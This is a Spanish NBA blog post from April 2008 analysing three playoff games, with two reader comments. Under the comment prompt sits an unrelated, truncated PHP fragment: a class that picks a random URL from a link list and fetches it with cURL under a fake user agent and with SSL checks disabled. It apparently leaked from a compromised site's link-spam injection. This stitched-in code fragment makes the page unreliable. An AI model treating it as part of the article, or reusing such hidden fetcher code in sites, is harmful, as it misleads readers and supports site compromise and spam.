Ineficaz como muchos

26 de April de 2008 por Viva_Dirk

by TheDeerHunter & Viva_Dirk

El pez pequeñillo se come a los bichos grandes (PHO 99 – SA 115)

Tony Parker, con una actuación extraordinaria (41 puntos, 12 asistencias y 5 rebotes) destrozó sin piedad a unos Suns que empiezan a evidenciar el fracaso del arriesgado fichaje de Shaquille O’Neal cuando eran líderes destacados de su conferencia. Y es que si la motivación de ese traspaso era el tener un juego interior decisivo para los Playoffs en el oeste, lo que finalmente se ha obtenido es un equipo desequilibrado con respecto a su línea exterior y pocos hay como Popovich a la hora de explotar puntos débiles en los equipos contrarios.

Sin Grant Hill al 100% por problemas físicos, Steve Nash se está encontrando demasiado solo ahí fuera. Los Spurs han encontrado la manera de asfixiarlo a ambos lados de la cancha y se está poniendo de manifiesto que el extraordinario base canadiense ahora mismo no puede hacer frente a este desgaste. Sin juego exterior la brutal potencia de Shaq y Stoudemire se estrella contra una zona muy poblada de duros defensores, la tela de araña de los Spurs. Ahí mueren todas las posibilidades de los de D’Antoni.

A pesar de todo nadie se esperaba este fatal desenlace y nadie piensa que mantengan alguna gota de esperanza. La sensación que queda es la más completa impotencia de un equipo descosido y que sufrirá grandes dificultades en el futuro inmediato. Una pena de proyecto que resultaba atractivo como pocos pero que se ha mostrado ineficaz como muchos.

De potencial a realidad (DET 75 – PHI 95)

En incontables ocasiones miramos la plantilla de un equipo y pensamos ‘tienen potencial’, y a mediados de temporadas nos encontramos con un equipo que ni defiende, ni tiene actitud ni voluntad de ser un equipo. Cuando eso sucede todo se achaca a que son jovenes o a que se les ha sobrevalorado. Philadelphia era uno de esos equipos a principio de temporada, nosotros mismos lo dijimos. Esperábamos un equipo de mucha estadística, mates y jugadas espectaculares. Pero no contábamos con dos personas, un entrenador y un jugador, ambos serios y disciplinados, que han convertido el potencial en realidad. Maurice Cheeks y Andre Miller lo han conseguido.

Anoche los Sixers ahogaron a los Pistons, lo que tantas veces hemos visto hacer a Billups y compañía se lo hicieron a ellos. Sólo permitieron 66 tiros de campo y no hubo ningun momento de relajación, en ningún cuarto recibieron mas de 20 puntos, robaron balones, provocaron pérdidas y no permitieron el rebote ofensivo. Así es como se deja a un equipo de 59 victorias en 75 puntos. En ataque Miller decide lo que hay que hacer, anoche anotó 21 puntos y apenas asistió dejando ese papel a Green e Iguodala que apenas lanzaron a canasta. Desde que se fuera Korver Philadelphia es un equipo que apenas tira de tres salvo emergencia, tienen un juego definido que favorece los porcentajes altos y que carga el rebote ofensivo como pocos.

Desde luego no damos por muertos a los Pistons que tienen experiencia para regalar, pero frente a estos Sixers están echando en falta la falta de un center puro que deje mas espacios a Sheed y facilite la labor de Billups. Pase lo que pase, estos Sixers son ya una realidad.

Las inversiones de Mark Cuban (NOH 87 – DAL 97)

El dueño de los Mavs es uno de los mas carismáticos de la NBA, suelta la pasta sin remordimiento ninguno y este año está pagando 105 millones de dolares en salarios, de los cuales 52 van destinados a los jugadores que deben acompañar a Dirk Nowitzki a la consecución del anillo. En estos playoffs esos 52 millones de dolares estaban dejando a Nowitzki solo ante el peligro con actuaciones vergonzosas, pero ayer llegaban a casa y la cosa cambió… un poco.

Kidd y Howard siguen sin encontrar buenas sensaciones. El base estuvo una vez más por debajo de los 10 puntos de anotación y solo repartió 5 asistencias, mientras que Howard volvió a estar desastroso en el tiro con 5 de 16 y no reboteó ni robó balones aunque al menos estuvo agresivo de cara al aro. El que respondió fue Terry, que claramente mejora en casa. Sus 22 puntos y 6 asistencias acompañados de una actitud encomiable le hicieron el mejor escudero de Nowitzki. El alemán estuvo brillante en ataque y comprometido en defensa, encontró a sus compañeros en posiciones ventajosas, cosa poco habitual en él hasta la fecha, anotó con fluidez y cargó de faltas al juego interior de Byron Scott.

En los Hornets mal partido de Paul&West, con lo que Stojakovic y Chandler tuvieron menos huecos para anotar con facilidad. El base estuvo bien defendido por Terry mientras que Nowitzki y Bass hacían ayudas lo suficientemente largas para hacerle dudar y lo bastante cortas para no permitir el pase, lo que forzó a CP3 a un 4 de 18 en tiros. David West empezó mal y no supo rectificar, falló al menos 4 tiros solo desde 4 metros, no fue capaz de penetrar y en defensa no pudo con Nowitzki en ningun momento. Stojakovic y Chandler estuvieron muy bien cerrando el rebote a su par, aunque en ataque apenas participaron, al contrario que Pargo que estuvo flojo en defensa y en cambio, anotó suspensión tras suspensión, aguantando a su equipo hasta los últimos minutos.

Dallas necesita a Kidd y Howard para ganar esta eliminatoria porque Byron Scott encontrará seguro unas cuantas soluciones a los problemas que tuvieron anoche, y la única novedad que podría presentar Dallas es un buen partido de estos dos hombres.

Comenta

2 comentarios a esta entrada

  1. txusma dice:
    #1

    Mala pinta tiene para Suns los años venideros. El equipo es complicado q mejore y todos tendran un año mas y eso en gente como Hill, O’Neal o Nash, se nota.

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    un año más que a esas edades implica un gran avance en actividades como el mus o el chamelo, y en otras represente un año-luz. Eso sí,,,igual están bebiendo todos F*** Vella.

    ***; para no hacer publicicdad aquí.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>